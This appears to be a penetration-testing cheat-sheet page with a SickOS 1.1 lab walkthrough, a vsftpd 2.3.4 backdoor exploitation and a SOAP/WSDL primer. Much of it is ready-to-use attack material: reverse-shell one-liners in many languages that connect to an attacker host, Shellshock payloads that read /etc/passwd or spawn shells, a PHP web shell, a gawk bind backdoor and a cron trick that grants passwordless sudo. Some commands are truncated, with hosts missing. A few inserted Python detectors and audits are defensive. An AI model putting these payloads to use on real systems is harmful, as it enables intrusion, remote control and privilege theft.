Pentest Killer Commands

Cheat Sheets

Vulnerability assessment

Scanning a web application with nikto through a proxy:

nikto -host 192.168.xx.xx -useproxy http://192.168.xx.xx:3129


Directory brute force with dirb through a proxy:

dirb http://192.168.XX.XX -p 192.168.XX.XX:3129

WPScan through a proxy:

wpscan --url http://192.168.XX.XX/dir --proxy http://192.168.XX.XX:3128

Curl Commands

Fetching a page through a proxy:

  1. curl 192.168.XX.XX/robots.txt -x 192.168.XX.XX:3128
  2. curl --proxy


Fetch in verbose mode:

 curl -v --proxy


Shellshock exploitation with curl (the payload travels in the User-Agent header; $CMD stands for the command to run):

curl -H "User-Agent: () { :; }; echo; $CMD" --proxy



curl -H "User-Agent: () { :; }; echo; /bin/uname -a" --proxy
curl -x -A "() { :; };/bin/sh -i >& /dev/tcp/ 0>&1"


Reverse Shell with Curl

curl 'http://192.168.XX.XX/cgi-bin/index.cgi' --user-agent ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc XXX.XXX.XXX.XXX 80 >/tmp/f;exit' --data 'dest=%0ash</proc/self/environ'

Shellshock exploitation with wget:

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy= ""
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/ 0<&1" -e use_proxy=on -e http_proxy= ""
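The defender's side of the curl and wget commands above: an added example (not from the original cheat sheet) that parses constructed Apache combined-format log lines and flags requests whose User-Agent or Referer carries the Shellshock function-definition pattern. The log lines, IPs and timestamps are constructed; the two payloads are the ones quoted in the commands above.

```python
import re

# Constructed sample lines in Apache "combined" log format (not real traffic);
# the two payloads are the ones quoted in the curl and wget commands above.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo; /bin/uname -a"
10.0.0.7 - - [10/Oct/2014:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [10/Oct/2014:13:56:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { test;};echo; /bin/cat /etc/passwd" "curl/7.38.0"
"""

# A Shellshock payload starts with a function definition "() { ... }" followed by
# the commands a vulnerable bash ran when the header was exported into the CGI
# environment. Such a value in a request header is never legitimate.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def find_shellshock(log_text):
    """Return (client ip, request line, header, payload) for each hit.

    Both User-Agent and Referer are checked: a CGI handler exports either one
    into the environment (HTTP_USER_AGENT / HTTP_REFERER), so either can carry it.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for header in ("ua", "referer"):
            if SHELLSHOCK_RE.search(rec[header]):
                hits.append((rec["ip"], rec["req"], header, rec[header]))
    return hits

if __name__ == "__main__":
    for ip, req, header, payload in find_shellshock(SAMPLE_LOG):
        print("%s %s via %s: %s" % (ip, req, header, payload))
```

The same pattern is what a WAF rule or a patched bash removes the need for; on the host side, the fix is a bash build that no longer parses trailing commands after an exported function.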

Spawn Shell

Spawn a Python TTY shell:

python -c 'import pty; pty.spawn("/bin/bash")'


Spawn an interactive sh shell:

/bin/sh -i


Spawn a Perl TTY shell (as a one-liner, or the same exec call inside a Perl script):

perl -e 'exec "/bin/sh";'

exec "/bin/sh";


Spawn a Ruby TTY shell (from a Ruby script or irb):

exec "/bin/sh"


Spawn a shell from the vi editor:



Spawn a TTY shell from Nmap:



Reverse Shells

Kali web shell directory:

root@kali:/usr/share/webshells# ls -ltr
total 0
drwxr-xr-x 2 root root 183 Jan 20 2016 php
drwxr-xr-x 2 root root 63 Jan 20 2016 perl
drwxr-xr-x 2 root root 33 Jan 20 2016 cfm
drwxr-xr-x 2 root root 34 Jan 20 2016 aspx
drwxr-xr-x 2 root root 56 Jan 20 2016 asp
drwxr-xr-x 1 root root 40 Feb 8 09:44 jsp


Bash reverse shells:

  1. bash -i > /dev/tcp/ATTACKERS_IP/port 0>&1
  2. exec /bin/bash 0&0 2>&0
  3. 0<&196;exec 196<>/dev/tcp/ATTACKERS_IP/80; sh <&196 >&196 2>&196
  4. exec 5<>/dev/tcp/ATTACKERS_IP/80; cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
  5. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 445 >/tmp/f


Bash reverse shell through bash -c, and the same payload injected through a web parameter:

bash -c "bash -i >& /dev/tcp/ 0>&1"
http://192.168.XX.XX:8080/?page=1&rcmd=bash -c "bash -i >& /dev/tcp/ATTACKERS_IP/31337 0>&1"



PHP:

php -r '$sock=fsockopen("ATTACKERS_IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Note: the TCP socket uses file descriptor 3. Replace 3 with 4, 5, or 6 if it doesn't work.



Netcat:

  1. nc -e /bin/sh ATTACKERS_IP Port
  2. /bin/sh | nc ATTACKERS_IP Port
  3. rm -f /tmp/p; mknod /tmp/p p && nc ATTACKERS_IP 4444 0</tmp/p



nc -e /bin/sh 4444



Telnet:

  1. rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p
  2. telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443



telnet 80 | /bin/bash | telnet 443



Perl:

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'



perl -e 'use Socket;$i="192.168.1.XX";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


Perl on Windows:

  1. perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  2. perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'



Ruby:

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'



Java:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])


Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


Python reverse shell passed through a URL parameter (URL-encode it before use):




http://192.168.XX.XX:port/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



Gawk (this one listens on port 8080 instead of connecting back):

#!/usr/bin/gawk -f
BEGIN {
    Port    = 8080
    Prompt  = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}




Building an exploit

Cross-compile a 32-bit binary on 64-bit Linux:

gcc -m32 exploit.c -o exploit


Cross-compile a 32-bit Windows .exe on Linux:

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe


Shellshock header payload:

() { ignored;};/bin/bash -i >& /dev/tcp/ 0>&1




Minimal PHP web shell (takes the command from the cmd request parameter):

<?php system($_REQUEST['cmd']); ?>






b374k shell 3.2


Privilege escalation

Cron job abuse (writing into a script that a root cron job runs):

echo 'chmod 777 /etc/sudoers && echo "<low-privilege user> ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /dir/<cronfile to run>


Reference Sites for enumeration


Reference Links for LFI:


IP Tables Rules:



Reference Links:



SickOS 1.1 Walkthrough


Attacking machine: Linux kali 4.3.0-kali1-amd64

Vulnerable machine: SickOS 1.1



Started a scan with the netdiscover command to find live hosts on my network.

We could see three IPs detected by netdiscover, including the gateway and the default address.

So our target would be


Run nmap to detect which services are running on the machine.

nmap -sS -sV -T4 -A

The nmap scan returns SSH and proxy port information.

Looking into port 3128 we know that a web server is running and that it can be accessed through the proxy port.

Configure the local browser to use the proxy in order to access the web page.

We are all set to access the web application. Now run nikto to detect whether any vulnerabilities are present in this application.

nikto -h -o out -F html

We found that robots.txt is present and that it reveals a wolfcms directory.

Navigating to the wolfcms directory lands on the Wolf CMS application.

By doing some research on the web I found the admin page location for the CMS application and the default username and password.

With the default username and password I was able to log in to the administrator account of the Wolf application. Under the Files tab of the application, an “Upload file” function is available in the public directory for uploading any file.

I created a c99 shell on the attacking machine and uploaded it with the “Upload file” option.

To launch the shell, navigate to the public directory and open shell.php, which returns a web shell.

Using the web shell we can list and navigate the directories. One directory up I found the config file.

The config file discloses the root password for MySQL. I navigated to the etc directory and found the passwd file with read permissions. This file can be downloaded with the web shell.

By analyzing passwd we know that “sickos” is a valid user with a bash shell.

I tried to log in as the sickos user with the password found in the config file and succeeded.

Privilege escalation:

Having only limited user access, I ran the sudo -l command to see what other commands the sickos user can run.

Interestingly, the sickos user can run all commands 🙂

Connect as the root user with sudo -s; I was logged in to the root account without a password.
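The cron-job trick in the privilege-escalation section and the sudo -l result in this walkthrough both come down to the same thing: a NOPASSWD: ALL rule in /etc/sudoers, reachable because a root-run cron script was writable. As an added audit (not part of the original write-up), this parses a constructed sudoers file for such rules and checks constructed cron-file stat data for entries a non-root user could edit. The sudoers content, paths, modes and uids are constructed samples.

```python
import re
import stat

# Constructed sudoers content (not from a real host). The "sickos" rule is the
# shape the cron trick appends and what "sudo -l" reported in the walkthrough.
SAMPLE_SUDOERS = """\
# /etc/sudoers
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
sickos  ALL=(ALL) NOPASSWD: ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
"""

# Constructed (path, st_mode, st_uid) triples as os.stat() would report them.
SAMPLE_CRON_FILES = [
    ("/etc/cron.d/backup",      0o100644, 0),
    ("/etc/cron.daily/cleanup", 0o100777, 0),     # world-writable: anyone can append commands
    ("/etc/cron.hourly/sync",   0o100755, 1000),  # owned by an unprivileged uid
]

# user  host=(runas) NOPASSWD: ALL   (the runas part is optional, as in the cron trick)
NOPASSWD_ALL_RE = re.compile(r"^(?P<who>[^#\s]\S*)\s+\S+=(?:\(.*?\)\s*)?NOPASSWD:\s*ALL\s*$")

def find_nopasswd_all(sudoers_text):
    """Principals (users or %groups) allowed to run ANY command without a password."""
    hits = []
    for line in sudoers_text.splitlines():
        m = NOPASSWD_ALL_RE.match(line.strip())
        if m:
            hits.append(m.group("who"))
    return hits

def audit_cron_files(entries):
    """Cron files a non-root user could modify: writable by group/other or not root-owned."""
    findings = []
    for path, mode, uid in entries:
        reasons = []
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("writable by group/other")
        if uid != 0:
            reasons.append("not owned by root")
        if reasons:
            findings.append((path, reasons))
    return findings

def sudoers_mode_ok(mode):
    """/etc/sudoers must be exactly 0440. The cron trick restores 0440 after
    editing, so a mode check alone never catches it: diff the content too."""
    return stat.S_IMODE(mode) == 0o440
```

On a live host, feed audit_cron_files() the output of os.stat() over /etc/crontab, /etc/cron.d and the cron.* directories, and compare find_nopasswd_all() against the rules you actually intended.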

vsFTPd Vulnerability Exploitation

vsftpd (Very Secure FTP Daemon) is an FTP server for Unix-like systems, including Linux; it is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions.

Identify the vulnerable host and scan it using nmap or any other favourite scanning tool:

nmap -p0-65535


The interesting part of this machine is port 21: if we enumerate the FTP service by connecting to port 21 with telnet, we might get some information.

root@kali:~# telnet 21
Connected to
Escape character is '^]'.
220 (vsFTPd 2.3.4)

This machine has vsFTPd installed, and version 2.3.4 is vulnerable: it contains a backdoor that allows command execution.

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Set RHOST and RPORT, then run the exploit.


Got the shell 🙂

Getting started with web penetration testing


Why web applications are major targets for attackers:

  • Web services are easy to penetrate from the attacker’s point of view.
  • Web services handle sensitive data, so an attacker can obtain sensitive information.
  • The growth of mobile applications attracts attackers towards the web services behind them.
  • Due to the lack of security implementations and resources available, web services play a vital role, which makes them a likely attack vector.

SOA: Service-Oriented Architecture

Service-oriented architecture is a software design and architecture pattern based on discrete pieces of software that provide application functionality as services (hence service-oriented). A service is a self-contained logical representation of a repeatable function or activity. Services can be combined by other software applications that together provide the complete functionality of a large software application.

A service is a well-defined activity that does not depend on the state of other services.

Web service

A web service is a standardized way of establishing communication between two web-based applications using open standards over an internet protocol such as HTTP or HTTPS.

  • Web services are application components
  • Web services communicate using open protocols
  • Web services are self-contained and self-describing
  • Web services can be discovered using UDDI
  • Web services can be used by other applications
  • HTTP and XML are the basis for web services


Advantages of web services:

  • Language interoperability (programming language independent)
  • Platform independent (hardware and OS independent)
  • Function reusability
  • Firewall friendly
  • Use of standardized protocols
  • Stateless communication
  • Economic

Components of web services

  • Service Consumer
  • Service Provider
  • XML (Extensible Markup Language)
  • SOAP (Simple Object Access Protocol)
  • WSDL (Web Services Description Language)
  • UDDI (Universal Description, Discovery and Integration)

Simple Object Access Protocol (SOAP)

SOAP is an XML-based protocol that lets applications exchange information over HTTP; web services use the SOAP format to send XML requests.

The actual data flows in the body block and the metadata is usually carried by the header block.

Web Services Description Language (WSDL)

Web Services Description Language is an XML-based language for describing web services and how to access them.

As far as pen testing web services is concerned, understanding the WSDL file helps a lot in manual testing. We can divide the WSDL file structure into two parts: the first part describes what the web service does and the second part tells how to access it.


What it contains

definitions element

All the XML elements are packed under the definitions element. It is also called the root or parent element of the WSDL file.

types element

All the schema types (data types) are defined here.

message element

This is a dependent element. A message is specified according to the data types defined in the types element, and is used inside the operation element later.

portType element

This element collects all the operations within a web service.

operation element

A collection of input, output, fault and other messages as specified in the message element.

input message

It's nothing but the parameters of the method used in the SOAP request.

output message

It's nothing but the parameters of the method used in the SOAP response.

binding element

This element connects part 2 of the WSDL file with part 1 by associating itself with the portType element, and lets you define the protocol you want to use.

It formulates the SOAP message at runtime.

service element

Contains the names of all the services provided by the service provider.

port element

It provides the physical path or location (address) of the web service so that the service consumer can connect with the service provider.

Example WSDL file (excerpt):
<?xml version="1.0" encoding="UTF-8" ?> 
 <definitions xmlns="" xmlns:tns="" xmlns:mime="" xmlns:http="" xmlns:soapenc="" xmlns:itrcmns="" xmlns:xs="" xmlns:soap="" targetNamespace="">
 <xs:schema xmlns:itrException="" xmlns:authInfo="" targetNamespace="" elementFormDefault="qualified" attributeFormDefault="unqualified">
 <xs:import namespace="" schemaLocation="" /> 
 <xs:import namespace="" schemaLocation="" /> 
 <xs:element name="ITRInvalidDocFaultException" type="itrException:ITRInvalidDocFaultException" /> 
 <xs:element name="ITRCredentialFaultException" type="itrException:ITRCredentialFaultException" /> 
 <xs:element name="ITRInvalidCertificateFaultException" type="itrException:ITRInvalidCertificateFaultException" /> 
 <xs:element name="ITRServiceFaultException" type="itrException:ITRServiceFaultException" /> 
 <xs:element name="ITRBusinessServiceFaultException" type="itrException:ITRBusinessServiceFaultException" /> 
 <xs:element name="ITRFaultException" type="itrException:ITRFaultException" /> 
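To make the two-part structure described above concrete, here is an added example (not code from the original page) that walks a constructed, minimal WSDL 1.1 document: it joins message, portType, binding, service and port into one inventory per endpoint, and then applies the check a tester does first by hand, looking for operations that accept a password-like parameter on a plain http:// address. The WSDL content, service names and the example.test location are constructed.

```python
import xml.etree.ElementTree as ET

W = "{http://schemas.xmlsoap.org/wsdl/}"        # WSDL 1.1 namespace
S = "{http://schemas.xmlsoap.org/wsdl/soap/}"   # SOAP binding namespace
# Constructed minimal WSDL 1.1 document with one service (not the page's example).
SAMPLE_WSDL = """<?xml version="1.0"?>
<definitions xmlns="http://schemas.xmlsoap.org/wsdl/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
  xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:tns="http://example.test/itr" targetNamespace="http://example.test/itr">
  <message name="LoginRequest"><part name="username" type="xs:string"/><part name="password" type="xs:string"/></message>
  <message name="LoginResponse"><part name="token" type="xs:string"/></message>
  <portType name="ITRPortType">
    <operation name="Login"><input message="tns:LoginRequest"/><output message="tns:LoginResponse"/></operation>
  </portType>
  <binding name="ITRBinding" type="tns:ITRPortType"><soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/></binding>
  <service name="ITRService">
    <port name="ITRPort" binding="tns:ITRBinding"><soap:address location="http://example.test/itr"/></port>
  </service>
</definitions>
"""

def local(qname):
    return qname.split(":", 1)[-1]   # drop the prefix of a QName such as tns:LoginRequest

def parse_wsdl(text):
    """Join part 1 (message/portType) to part 2 (binding/service/port): one dict per endpoint."""
    root = ET.fromstring(text)
    messages = {m.get("name"): [p.get("name") for p in m.findall(W + "part")]
                for m in root.findall(W + "message")}
    port_types = {}
    for pt in root.findall(W + "portType"):
        port_types[pt.get("name")] = {
            op.get("name"): {d: messages.get(local(op.find(W + d).get("message")), [])
                             for d in ("input", "output") if op.find(W + d) is not None}
            for op in pt.findall(W + "operation")}
    bindings = {b.get("name"): local(b.get("type")) for b in root.findall(W + "binding")}
    endpoints = []
    for svc in root.findall(W + "service"):
        for port in svc.findall(W + "port"):
            addr = port.find(S + "address")
            endpoints.append({"service": svc.get("name"), "port": port.get("name"),
                              "location": addr.get("location") if addr is not None else "",
                              "operations": port_types.get(bindings.get(local(port.get("binding"))), {})})
    return endpoints

def flag_cleartext_credentials(endpoints):
    """Operations taking a password-like parameter on a plain http:// endpoint."""
    return [(ep["service"], name) for ep in endpoints if ep["location"].startswith("http://")
            for name, io in ep["operations"].items()
            if any("pass" in p.lower() for p in io.get("input", []))]
```

The same inventory is what you would compare against the operations the service was actually meant to expose; anything extra is worth a question before it is worth a test.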


  • WSDL stands for Web Services Description Language
  • WSDL is an XML-based language for describing Web services.
  • WSDL is a W3C recommendation


  • SOAP stands for Simple Object Access Protocol
  • SOAP is an XML-based protocol for accessing web services.
  • SOAP is based on XML
  • SOAP is a W3C recommendation